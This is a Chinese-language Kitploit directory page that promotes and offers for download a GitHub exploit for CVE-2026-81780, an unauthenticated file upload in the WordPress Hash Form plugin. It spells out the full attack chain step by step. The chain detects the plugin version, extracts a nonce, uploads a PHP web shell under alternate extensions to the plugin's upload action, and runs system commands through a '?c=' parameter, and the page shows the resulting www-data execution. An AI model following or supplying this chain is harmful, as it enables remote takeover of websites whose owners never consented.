Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-81780-Hash-Form — CVE-2026-81780 的漏洞利用:WordPress Hash Form 插件中存在未认证的文件上传漏洞,可通过精心构造的 PHP 载荷实现远程代码执行。 | Kitploit
工具/GitHubGitHub/0xterror/cve-2026-81780-hash-form
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHub0xterror/cve-2026-81780-hash-form

CVE-2026-81780-Hash-Form

CVE-2026-81780 的漏洞利用:WordPress Hash Form 插件中存在未认证的文件上传漏洞,可通过精心构造的 PHP 载荷实现远程代码执行。

查看仓库
16小时12分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-81780-Hash-Form

CVE-2026-81780 — Hash Form 远程代码执行漏洞

漏洞详情

WordPress Hash Form 插件(≤ 1.4.2)存在未授权文件上传漏洞。该插件允许任意文件上传,且未进行适当的身份验证或文件类型校验,从而导致远程代码执行(RCE)。


漏洞利用链

步骤 操作 1 攻击者通过 readme.txt 检测 Hash Form 插件 2 通过预览表单(hashform_preview)提取 ajax_nounce 3 向 hashform_file_upload_action 发送携带 PHP 载荷的 POST 请求 4 以 .phar、.phtml、.php5 或 .php7 扩展名上传 Web Shell 5 通过访问 /wp-content/uploads/hashform/temp/v.{ext} 触发 Shell 6 通过 ?c=id 执行系统命令

root@kitploit:~

GET /wp-content/plugins/hash-form/readme.txt
    ↓
检测到版本(≤ 1.4.2)
    ↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
    ↓
提取 Nonce:ajax_nounce=...
    ↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
    ↓
上传:v.phar(或 .phtml、.php5、.php7)
    ↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
    ↓
命令已执行(uid=www-data)```
下载工具